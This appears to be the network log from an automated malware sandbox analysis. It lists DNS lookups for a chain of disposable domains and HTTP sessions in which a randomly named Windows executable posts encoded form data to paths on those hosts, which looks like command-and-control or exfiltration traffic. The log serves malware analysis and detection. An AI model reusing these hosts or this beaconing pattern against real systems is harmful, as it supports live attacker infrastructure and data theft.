                                                    Jan 13, 2025 09:35:51.144231081 CET6503453192.168.2.61.1.1.1
                                                    Jan 13, 2025 09:35:51.489020109 CET53650341.1.1.1192.168.2.6
                                                    Jan 13, 2025 09:36:05.800980091 CET5761353192.168.2.61.1.1.1
                                                    Jan 13, 2025 09:36:06.369585991 CET53576131.1.1.1192.168.2.6
                                                    Jan 13, 2025 09:36:19.956609011 CET5662553192.168.2.61.1.1.1
                                                    Jan 13, 2025 09:36:19.978338003 CET53566251.1.1.1192.168.2.6

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Jan 13, 2025 09:34:22.845370054 CET192.168.2.61.1.1.10xf33fStandard query (0)www.kx22368.shopA (IP address)IN (0x0001)false
                                                    Jan 13, 2025 09:34:39.156742096 CET192.168.2.61.1.1.10x1420Standard query (0)www.laduta.xyzA (IP address)IN (0x0001)false
                                                    Jan 13, 2025 09:34:52.317348957 CET192.168.2.61.1.1.10xc834Standard query (0)www.einpisalpace.shopA (IP address)IN (0x0001)false
                                                    Jan 13, 2025 09:35:07.176517010 CET192.168.2.61.1.1.10xf4a8Standard query (0)www.ripbgs.infoA (IP address)IN (0x0001)false
                                                    Jan 13, 2025 09:35:21.644254923 CET192.168.2.61.1.1.10x83daStandard query (0)www.0303588a47.buzzA (IP address)IN (0x0001)false
                                                    Jan 13, 2025 09:35:29.706964016 CET192.168.2.61.1.1.10x1f0eStandard query (0)www.tizzles.techA (IP address)IN (0x0001)false
                                                    Jan 13, 2025 09:35:37.769629002 CET192.168.2.61.1.1.10x9629Standard query (0)www.explorevision.xyzA (IP address)IN (0x0001)false
                                                    Jan 13, 2025 09:35:51.144231081 CET192.168.2.61.1.1.10xacc9Standard query (0)www.babyzhibo.netA (IP address)IN (0x0001)false
                                                    Jan 13, 2025 09:36:05.800980091 CET192.168.2.61.1.1.10x3d71Standard query (0)www.mzkd6gp5.topA (IP address)IN (0x0001)false
                                                    Jan 13, 2025 09:36:19.956609011 CET192.168.2.61.1.1.10xc001Standard query (0)www.potorooqr.lolA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Jan 13, 2025 09:34:23.198744059 CET1.1.1.1192.168.2.60xf33fNo error (0)www.kx22368.shopurl.gname.netCNAME (Canonical name)IN (0x0001)false
                                                    Jan 13, 2025 09:34:23.198744059 CET1.1.1.1192.168.2.60xf33fNo error (0)url.gname.net172.65.235.97A (IP address)IN (0x0001)false
                                                    Jan 13, 2025 09:34:39.168798923 CET1.1.1.1192.168.2.60x1420No error (0)www.laduta.xyz192.64.119.109A (IP address)IN (0x0001)false
                                                    Jan 13, 2025 09:34:52.328912973 CET1.1.1.1192.168.2.60xc834No error (0)www.einpisalpace.shop188.114.96.3A (IP address)IN (0x0001)false
                                                    Jan 13, 2025 09:34:52.328912973 CET1.1.1.1192.168.2.60xc834No error (0)www.einpisalpace.shop188.114.97.3A (IP address)IN (0x0001)false
                                                    Jan 13, 2025 09:35:07.352412939 CET1.1.1.1192.168.2.60xf4a8No error (0)www.ripbgs.info47.83.1.90A (IP address)IN (0x0001)false
                                                    Jan 13, 2025 09:35:21.652771950 CET1.1.1.1192.168.2.60x83daName error (3)www.0303588a47.buzznonenoneA (IP address)IN (0x0001)false
                                                    Jan 13, 2025 09:35:29.715720892 CET1.1.1.1192.168.2.60x1f0eName error (3)www.tizzles.technonenoneA (IP address)IN (0x0001)false
                                                    Jan 13, 2025 09:35:37.784902096 CET1.1.1.1192.168.2.60x9629No error (0)www.explorevision.xyz162.0.236.169A (IP address)IN (0x0001)false
                                                    Jan 13, 2025 09:35:51.489020109 CET1.1.1.1192.168.2.60xacc9No error (0)www.babyzhibo.net192.186.58.31A (IP address)IN (0x0001)false
                                                    Jan 13, 2025 09:36:06.369585991 CET1.1.1.1192.168.2.60x3d71No error (0)www.mzkd6gp5.top104.21.16.1A (IP address)IN (0x0001)false
                                                    Jan 13, 2025 09:36:06.369585991 CET1.1.1.1192.168.2.60x3d71No error (0)www.mzkd6gp5.top104.21.112.1A (IP address)IN (0x0001)false
                                                    Jan 13, 2025 09:36:06.369585991 CET1.1.1.1192.168.2.60x3d71No error (0)www.mzkd6gp5.top104.21.96.1A (IP address)IN (0x0001)false
                                                    Jan 13, 2025 09:36:06.369585991 CET1.1.1.1192.168.2.60x3d71No error (0)www.mzkd6gp5.top104.21.48.1A (IP address)IN (0x0001)false
                                                    Jan 13, 2025 09:36:06.369585991 CET1.1.1.1192.168.2.60x3d71No error (0)www.mzkd6gp5.top104.21.80.1A (IP address)IN (0x0001)false
                                                    Jan 13, 2025 09:36:06.369585991 CET1.1.1.1192.168.2.60x3d71No error (0)www.mzkd6gp5.top104.21.32.1A (IP address)IN (0x0001)false
                                                    Jan 13, 2025 09:36:06.369585991 CET1.1.1.1192.168.2.60x3d71No error (0)www.mzkd6gp5.top104.21.64.1A (IP address)IN (0x0001)false
                                                    Jan 13, 2025 09:36:19.978338003 CET1.1.1.1192.168.2.60xc001No error (0)www.potorooqr.lol127.0.0.1A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • www.kx22368.shop
                                                    • www.laduta.xyz
                                                    • www.einpisalpace.shop
                                                    • www.ripbgs.info
                                                    • www.explorevision.xyz
                                                    • www.babyzhibo.net
                                                    • www.mzkd6gp5.top

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.649984172.65.235.97806688C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 13, 2025 09:34:23.221297979 CET515OUTGET /ca6n/?YFCLW=BxgTctSh&CviT=0h9Wf4Uk+EHtRoE9GYslXHc8OAVXToPYP42Hdey84aKhqV9wbfXJif0/+OnZ2BVp9cN120ZusPNi0A+xg/3t9NEZmf+IGJW1PRZ6E2m6SBA4aflrt404XQhuINrHqXgvx4ee6EU= HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.kx22368.shop
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Jan 13, 2025 09:34:24.093806028 CET302INHTTP/1.1 503 Service Temporarily Unavailable
                                                    Date: Mon, 13 Jan 2025 08:34:23 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: 2b02acc7f52abdc660a6aa29d2429c77=be1d67f97eb37e6653c4b92df79f54cb
                                                    Data Raw: 33 37 0d 0a 4c 6f 61 64 69 6e 67 20 69 6e 20 70 72 6f 67 72 65 73 73 2e 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 37Loading in progress.<script>location.href="";</script>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.649988192.64.119.109806688C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 13, 2025 09:34:39.194005966 CET766OUTPOST /d89m/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.laduta.xyz
                                                    Origin: http://www.laduta.xyz
                                                    Referer: http://www.laduta.xyz/d89m/
                                                    Cache-Control: no-cache
                                                    Content-Length: 209
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Data Raw: 43 76 69 54 3d 39 4d 68 4e 67 45 52 67 66 48 52 43 47 4c 70 76 43 61 69 36 56 70 41 76 33 50 58 63 61 63 45 7a 31 54 56 4d 2b 4c 41 49 31 49 66 2f 63 6c 46 70 65 49 71 77 62 5a 5a 2b 38 36 4b 30 76 70 49 70 50 67 65 31 6a 73 39 46 42 6f 6c 79 32 6f 51 46 30 6a 75 59 4c 62 6a 4f 72 79 54 36 77 73 39 33 43 59 51 76 37 55 76 59 50 51 38 56 4a 57 6c 63 41 49 49 6f 74 6c 36 4d 59 57 4c 36 4e 4e 6e 52 36 42 37 4d 2b 6e 56 55 70 30 39 55 6c 70 48 4d 62 58 45 73 71 64 42 31 5a 52 4e 33 62 6b 52 33 67 7a 6e 34 77 59 61 78 58 4b 38 34 75 66 68 5a 5a 37 50 4b 70 6a 4f 62 39 56 49 4a 75 6b 6d 66 61 44 35 6c 75 31 49 32 6b 6e 6f 34
                                                    Data Ascii: CviT=9MhNgERgfHRCGLpvCai6VpAv3PXcacEz1TVM+LAI1If/clFpeIqwbZZ+86K0vpIpPge1js9FBoly2oQF0juYLbjOryT6ws93CYQv7UvYPQ8VJWlcAIIotl6MYWL6NNnR6B7M+nVUp09UlpHMbXEsqdB1ZRN3bkR3gzn4wYaxXK84ufhZZ7PKpjOb9VIJukmfaD5lu1I2kno4
                                                    Jan 13, 2025 09:34:39.665046930 CET193INHTTP/1.1 302 Found
                                                    Date: Mon, 13 Jan 2025 08:34:39 GMT
                                                    Content-Length: 0
                                                    Connection: close
                                                    Location: https://laduta.xyz/d89m
                                                    X-Served-By: Namecheap URL Forward
                                                    Server: namecheap-nginx


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.649989192.64.119.109806688C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 13, 2025 09:34:41.743571043 CET790OUTPOST /d89m/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.laduta.xyz
                                                    Origin: http://www.laduta.xyz
                                                    Referer: http://www.laduta.xyz/d89m/
                                                    Cache-Control: no-cache
                                                    Content-Length: 233
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Data Raw: 43 76 69 54 3d 39 4d 68 4e 67 45 52 67 66 48 52 43 48 72 35 76 4f 5a 36 36 63 70 41 75 70 66 58 63 55 38 45 33 31 54 5a 4d 2b 4b 45 59 32 39 33 2f 64 46 31 70 64 4a 71 77 63 5a 5a 2b 6f 71 4b 73 72 70 49 59 50 67 53 54 6a 74 52 46 42 72 5a 79 32 70 67 46 30 53 75 66 4c 4c 6a 4d 6a 53 54 34 74 63 39 33 43 59 51 76 37 55 71 46 50 51 30 56 4a 69 68 63 53 64 6b 70 79 56 36 4c 4f 6d 4c 36 4a 4e 6e 72 36 42 36 5a 2b 6d 35 75 70 32 46 55 6c 70 33 4d 62 43 77 72 68 64 41 2b 64 52 4d 47 66 6b 5a 35 74 6a 75 37 35 70 53 33 4b 6f 73 4f 69 4a 38 44 46 49 50 70 37 7a 75 5a 39 58 51 37 75 45 6d 31 59 44 42 6c 38 69 45 52 72 54 4e 62 59 2b 54 71 39 65 7a 58 39 50 51 32 57 48 4c 50 43 34 45 54 42 67 3d 3d
                                                    Data Ascii: CviT=9MhNgERgfHRCHr5vOZ66cpAupfXcU8E31TZM+KEY293/dF1pdJqwcZZ+oqKsrpIYPgSTjtRFBrZy2pgF0SufLLjMjST4tc93CYQv7UqFPQ0VJihcSdkpyV6LOmL6JNnr6B6Z+m5up2FUlp3MbCwrhdA+dRMGfkZ5tju75pS3KosOiJ8DFIPp7zuZ9XQ7uEm1YDBl8iERrTNbY+Tq9ezX9PQ2WHLPC4ETBg==
                                                    Jan 13, 2025 09:34:42.204600096 CET193INHTTP/1.1 302 Found
                                                    Date: Mon, 13 Jan 2025 08:34:42 GMT
                                                    Content-Length: 0
                                                    Connection: close
                                                    Location: https://laduta.xyz/d89m
                                                    X-Served-By: Namecheap URL Forward
                                                    Server: namecheap-nginx


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.649990192.64.119.109806688C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 13, 2025 09:34:44.289352894 CET1803OUTPOST /d89m/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.laduta.xyz
                                                    Origin: http://www.laduta.xyz
                                                    Referer: http://www.laduta.xyz/d89m/
                                                    Cache-Control: no-cache
                                                    Content-Length: 1245
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Data Raw: 43 76 69 54 3d 39 4d 68 4e 67 45 52 67 66 48 52 43 48 72 35 76 4f 5a 36 36 63 70 41 75 70 66 58 63 55 38 45 33 31 54 5a 4d 2b 4b 45 59 32 39 76 2f 64 32 39 70 48 75 32 77 64 5a 5a 2b 30 61 4b 34 72 70 49 2f 50 67 4b 58 6a 74 4d 79 42 75 56 79 77 50 30 46 6b 68 32 66 46 4c 6a 4d 76 79 54 35 77 73 38 74 43 5a 38 6a 37 55 61 46 50 51 30 56 4a 6b 4e 63 52 49 49 70 30 56 36 4d 59 57 4c 2b 4e 4e 6d 45 36 41 66 75 2b 6d 4e 2b 6f 46 4e 55 6d 4a 6e 4d 5a 30 73 72 6f 64 41 38 52 78 4d 65 66 6b 45 37 74 6a 69 5a 35 6f 57 64 4b 6f 49 4f 6e 76 35 55 42 34 7a 49 74 42 71 72 6f 31 6f 33 75 53 57 2f 53 42 4a 65 74 6a 77 47 30 53 38 78 56 6f 44 4b 33 66 79 57 39 4f 6b 57 57 77 54 62 4c 6f 70 71 56 67 34 72 4b 61 77 78 39 4b 6f 59 36 68 49 6d 77 42 78 45 68 70 4c 43 75 4e 63 51 44 30 57 70 38 6a 4e 52 64 79 63 4b 41 54 77 47 68 2f 45 53 66 4c 57 72 34 4e 57 45 41 46 4a 68 49 6a 63 44 34 72 79 34 76 79 4f 68 33 4d 52 6c 43 79 32 7a 59 6a 37 79 6d 58 4d 4d 46 39 42 52 51 7a 6b 6e 66 6e 45 55 4c 78 42 38 42 5a 67 5a 67 [TRUNCATED]
                                                    Data Ascii: CviT=9MhNgERgfHRCHr5vOZ66cpAupfXcU8E31TZM+KEY29v/d29pHu2wdZZ+0aK4rpI/PgKXjtMyBuVywP0Fkh2fFLjMvyT5ws8tCZ8j7UaFPQ0VJkNcRIIp0V6MYWL+NNmE6Afu+mN+oFNUmJnMZ0srodA8RxMefkE7tjiZ5oWdKoIOnv5UB4zItBqro1o3uSW/SBJetjwG0S8xVoDK3fyW9OkWWwTbLopqVg4rKawx9KoY6hImwBxEhpLCuNcQD0Wp8jNRdycKATwGh/ESfLWr4NWEAFJhIjcD4ry4vyOh3MRlCy2zYj7ymXMMF9BRQzknfnEULxB8BZgZgyaBZZDMi/YPEmvKll7pIUOfbe6t4Ywm7+f2TfrYgLClnyIgQRz8+VBV2cb5jQc2uRQGRaHQHvXUbwFFbDlXucW9+y3+r6D1xpUfBAmxqKXRTVp4l0E07y23YOfl1mV9Ra7vN97kZ2h0RkWatofT7zcVxWQze1Ovptsp7CRBlM/9W3BDcQv2XCyC8ifOS0p6qEXn9N3ICwJaBARYVG7JjNKwbbHG1Q0T3Vci8ClFrx6xm5YcfNtCxfXpWRy75+wdTzJAiZ2puXmXulpaFMfiTIj5boq1QexKh0ccK+WMYyJGGKdUrM3Wd4Q/+aMM4XWzt5pFExbJGNJaC8nNewJFWHqs4RZwUScDfqsLI96k4JKaV2ZRwMcrQyONRMTZac8+WrsCC1MgIuoYfUL4rNde6tEhAGZ8XFneW7mii+xWtkcTapKSKnmpCLbX8HEWIdl0FJ5WMzWxv7VtZAK9yea8Nn2IlERF8di65rqC1fR04KVNGzLRjfhUo8XQp3LcedAiGnSPSrdq3QnnMBIkcOsFL2xRhdzcrx2lld6m9q6HZ1u0EN6E3dWl1SfFXEfvDJ7lmTQvML9h7xCHcR8NQkT25SVazB/ItmgXomfmEqMhlXo8ycp7fwQZsCvUbs4YJcVl+sKCvlv+AnWroq0D+0fIM6PSjH7+sQ35Jlg [TRUNCATED]
                                                    Jan 13, 2025 09:34:44.760562897 CET193INHTTP/1.1 302 Found
                                                    Date: Mon, 13 Jan 2025 08:34:44 GMT
                                                    Content-Length: 0
                                                    Connection: close
                                                    Location: https://laduta.xyz/d89m
                                                    X-Served-By: Namecheap URL Forward
                                                    Server: namecheap-nginx


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.649991192.64.119.109806688C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 13, 2025 09:34:46.830308914 CET513OUTGET /d89m/?CviT=wOJtjxBUJG0NHp56IJ7sd/1V3u72daYOpRR77J0hq9zwdUZOJreNUKl+oLjHq+QISX71stRTOJ1jv48F/TSYOOjikWrIxOApFu5A5DiOQ2wTGmACeJ5Y8X2xSxX+WaLEulDl8ws=&YFCLW=BxgTctSh HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.laduta.xyz
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Jan 13, 2025 09:34:47.303967953 CET607INHTTP/1.1 302 Found
                                                    Date: Mon, 13 Jan 2025 08:34:47 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Length: 209
                                                    Connection: close
                                                    Location: https://laduta.xyz/d89m?CviT=wOJtjxBUJG0NHp56IJ7sd%2F1V3u72daYOpRR77J0hq9zwdUZOJreNUKl+oLjHq+QISX71stRTOJ1jv48F%2FTSYOOjikWrIxOApFu5A5DiOQ2wTGmACeJ5Y8X2xSxX+WaLEulDl8ws%3D&YFCLW=BxgTctSh
                                                    X-Served-By: Namecheap URL Forward
                                                    Server: namecheap-nginx
                                                    Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6c 61 64 75 74 61 2e 78 79 7a 2f 64 38 39 6d 3f 43 76 69 54 3d 77 4f 4a 74 6a 78 42 55 4a 47 30 4e 48 70 35 36 49 4a 37 73 64 25 32 46 31 56 33 75 37 32 64 61 59 4f 70 52 52 37 37 4a 30 68 71 39 7a 77 64 55 5a 4f 4a 72 65 4e 55 4b 6c 2b 6f 4c 6a 48 71 2b 51 49 53 58 37 31 73 74 52 54 4f 4a 31 6a 76 34 38 46 25 32 46 54 53 59 4f 4f 6a 69 6b 57 72 49 78 4f 41 70 46 75 35 41 35 44 69 4f 51 32 77 54 47 6d 41 43 65 4a 35 59 38 58 32 78 53 78 58 2b 57 61 4c 45 75 6c 44 6c 38 77 73 25 33 44 26 59 46 43 4c 57 3d 42 78 67 54 63 74 53 68 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                    Data Ascii: <a href='https://laduta.xyz/d89m?CviT=wOJtjxBUJG0NHp56IJ7sd%2F1V3u72daYOpRR77J0hq9zwdUZOJreNUKl+oLjHq+QISX71stRTOJ1jv48F%2FTSYOOjikWrIxOApFu5A5DiOQ2wTGmACeJ5Y8X2xSxX+WaLEulDl8ws%3D&YFCLW=BxgTctSh'>Found</a>.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.649992188.114.96.3806688C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 13, 2025 09:34:52.357657909 CET787OUTPOST /pgw3/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.einpisalpace.shop
                                                    Origin: http://www.einpisalpace.shop
                                                    Referer: http://www.einpisalpace.shop/pgw3/
                                                    Cache-Control: no-cache
                                                    Content-Length: 209
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Data Raw: 43 76 69 54 3d 74 67 39 44 36 52 52 68 71 39 4d 54 7a 47 30 6b 77 71 51 44 74 39 47 64 75 38 50 72 75 73 44 4c 51 41 62 6d 2f 73 49 50 4a 45 6e 58 54 33 31 4e 38 45 50 72 6b 2b 76 54 34 4a 4f 6d 48 77 66 48 63 49 58 76 38 6c 36 44 45 2f 38 67 6a 53 6e 4d 34 44 79 31 6a 6c 43 43 53 2f 6d 77 68 63 2f 70 4b 4c 53 48 6e 42 5a 56 51 44 77 57 74 38 34 75 57 4e 75 6e 70 2f 2b 4d 73 71 49 74 30 37 74 77 44 5a 6f 48 74 6e 4b 58 63 54 71 66 6f 65 35 7a 30 39 43 36 65 47 53 58 6e 44 2b 55 6d 35 6e 68 2b 78 76 31 61 53 6e 6a 57 34 76 65 36 43 61 70 79 58 36 34 45 43 6d 59 44 71 61 4c 6a 69 50 72 6d 41 32 6e 62 48 75 64 38 37 78 36
                                                    Data Ascii: CviT=tg9D6RRhq9MTzG0kwqQDt9Gdu8PrusDLQAbm/sIPJEnXT31N8EPrk+vT4JOmHwfHcIXv8l6DE/8gjSnM4Dy1jlCCS/mwhc/pKLSHnBZVQDwWt84uWNunp/+MsqIt07twDZoHtnKXcTqfoe5z09C6eGSXnD+Um5nh+xv1aSnjW4ve6CapyX64ECmYDqaLjiPrmA2nbHud87x6
                                                    Jan 13, 2025 09:34:53.467041969 CET1236INHTTP/1.1 404 Not Found
                                                    Date: Mon, 13 Jan 2025 08:34:53 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Last-Modified: Sun, 05 Jan 2025 21:39:02 GMT
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KmpM3e1wafTDo8ga%2BUvIiVhequ6JWzaXHwyFkY3Wtg%2Baqy3WG8c5k9kX%2BlCkstptVF8%2FMjmTyhZNDZrripHRhR%2BolcTYrFXfZ1Bh89us%2FW5piyDAF3Fq5TRk8LdtXiZxl7lO8xmkg3Q%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 90140cb7bf2b1899-EWR
                                                    Content-Encoding: gzip
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1559&min_rtt=1559&rtt_var=779&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=787&delivery_rate=0&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                    Data Raw: 32 64 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 4d 6f db 38 10 bd e7 57 cc 2a d8 45 17 a8 4c cb 4e 9b 58 92 05 64 ed 04 5b a0 db 06 ad 8b dd 1c 19 69 2c 32 95 48 2e 39 96 ad 06 fd ef 05 25 c5 76 d0 0f f4 50 ea 42 cd bc 79 6f 86 9c 61 fa db f2 ed 62 75 7b 73 05 82 ea 0a 6e 3e fc f5 fa d5 02 82 90 b1 7f a7 0b c6 96 ab 25 fc f7 f7 ea 9f d7 10 8d c6 f0 9e ac cc 89 b1 ab 37 01 04 82 c8 c4 8c 6d b7 db d1 76 3a d2 b6 64 ab 77 6c e7 59 22 1f 36 6c 43 d7 c5 8c 0a 2a 82 ec 24 ed 44 76 75 a5 dc fc 1b 04 d1 6c 36 eb e3 02 0f 8a 2b ae ca 79 80 2a 80 fd 2e 4b 05 f2 22 3b 01 00 48 49 52 85 d9 d9 f8 0c fe a8 0b ee 44 02 6f 34 c1 b5 de a8 22 65 bd b3 07 d6 48 1c bc 5e 88 ff 6f 64 33 0f 16 5a 11 2a 0a 57 ad c1 00 f2 fe 6f 1e 10 ee 88 79 fd 04 72 c1 ad 43 9a 7f 58 5d 87 17 01 3b 26 52 bc c6 79 50 a0 cb ad 34 24 b5 3a 62 78 af ad 6d 9f 83 e1 25 82 d2 04 6b 9f cc 3e dc 51 5b 21 50 6b 70 d0 ca 9d 0b 7a 9f 5f 77 ba 68 e1 61 ad 15 85 4e 7e c2 38 3a 33 bb 04 72 5d 69 1b 9f 9e 77 2b 81 ce bd e6 b5 ac da 98 5b c9 ab 04 3c [TRUNCATED]
                                                    Data Ascii: 2daTMo8W*ELNXd[i,2H.9%vPByoabu{sn>%7mv:dwlY"6lC*$Dvul6+y*.K";HIRDo4"eH^od3Z*WoyrCX];&RyP4$:bxm%k>Q[!Pkpz_whaN~8:3r]iw+[<U+Y8GEh{N=aQf
                                                    Jan 13, 2025 09:34:53.467108011 CET381INData Raw: e7 97 d7 09 d4 dc 96 52 c5 70 3e 36 3b 18 fb ef 98 60 02 0f 3d 1e 4e 97 57 2f 17 2f 96 4f 73 80 21 89 83 08 4c 3a 91 ce b0 45 59 0a 8a e1 4e 57 45 02 15 12 a1 0d 9d e1 b9 54 65 0c 61 e4 81 8f f2 e1 b4 93 9f ce cc ee 48 df c0 c3 56 16 24 e2 69 4f
                                                    Data Ascii: Rp>6;`=NW//Os!L:EYNWETeaHV$iOuAXb!iwGiyP(dK4<x8'F:IXs"t;uw&K9$TF:^mX}eKRfK +dsWv@~fZ-ZT%<


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.649993188.114.96.3806688C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 13, 2025 09:34:54.899080038 CET811OUTPOST /pgw3/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.einpisalpace.shop
                                                    Origin: http://www.einpisalpace.shop
                                                    Referer: http://www.einpisalpace.shop/pgw3/
                                                    Cache-Control: no-cache
                                                    Content-Length: 233
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Data Raw: 43 76 69 54 3d 74 67 39 44 36 52 52 68 71 39 4d 54 79 6c 73 6b 79 4d 59 44 72 64 47 63 79 4d 50 72 6e 4d 44 50 51 41 48 6d 2f 70 77 68 49 32 44 58 54 53 5a 4e 39 46 50 72 6c 2b 76 54 7a 70 4f 76 4a 51 66 49 63 49 72 52 38 6c 47 44 45 37 55 67 6a 53 58 4d 34 30 75 32 69 31 43 41 65 66 6d 79 38 73 2f 70 4b 4c 53 48 6e 42 4d 34 51 44 59 57 73 4e 49 75 4d 73 75 6f 6a 66 2b 4c 6d 4b 49 74 2f 62 74 30 44 5a 6f 66 74 6c 76 4b 63 52 69 66 6f 63 68 7a 30 6f 32 35 55 47 53 52 6f 6a 2f 51 6e 6f 61 49 6d 69 7a 33 52 6b 6e 54 4c 49 72 2f 37 30 48 7a 75 6b 36 62 57 53 47 61 44 6f 43 35 6a 43 50 42 6b 41 4f 6e 4a 51 69 36 7a 50 55 5a 33 65 4f 56 6c 50 5a 53 47 42 42 38 4e 72 50 6c 6b 59 73 51 58 51 3d 3d
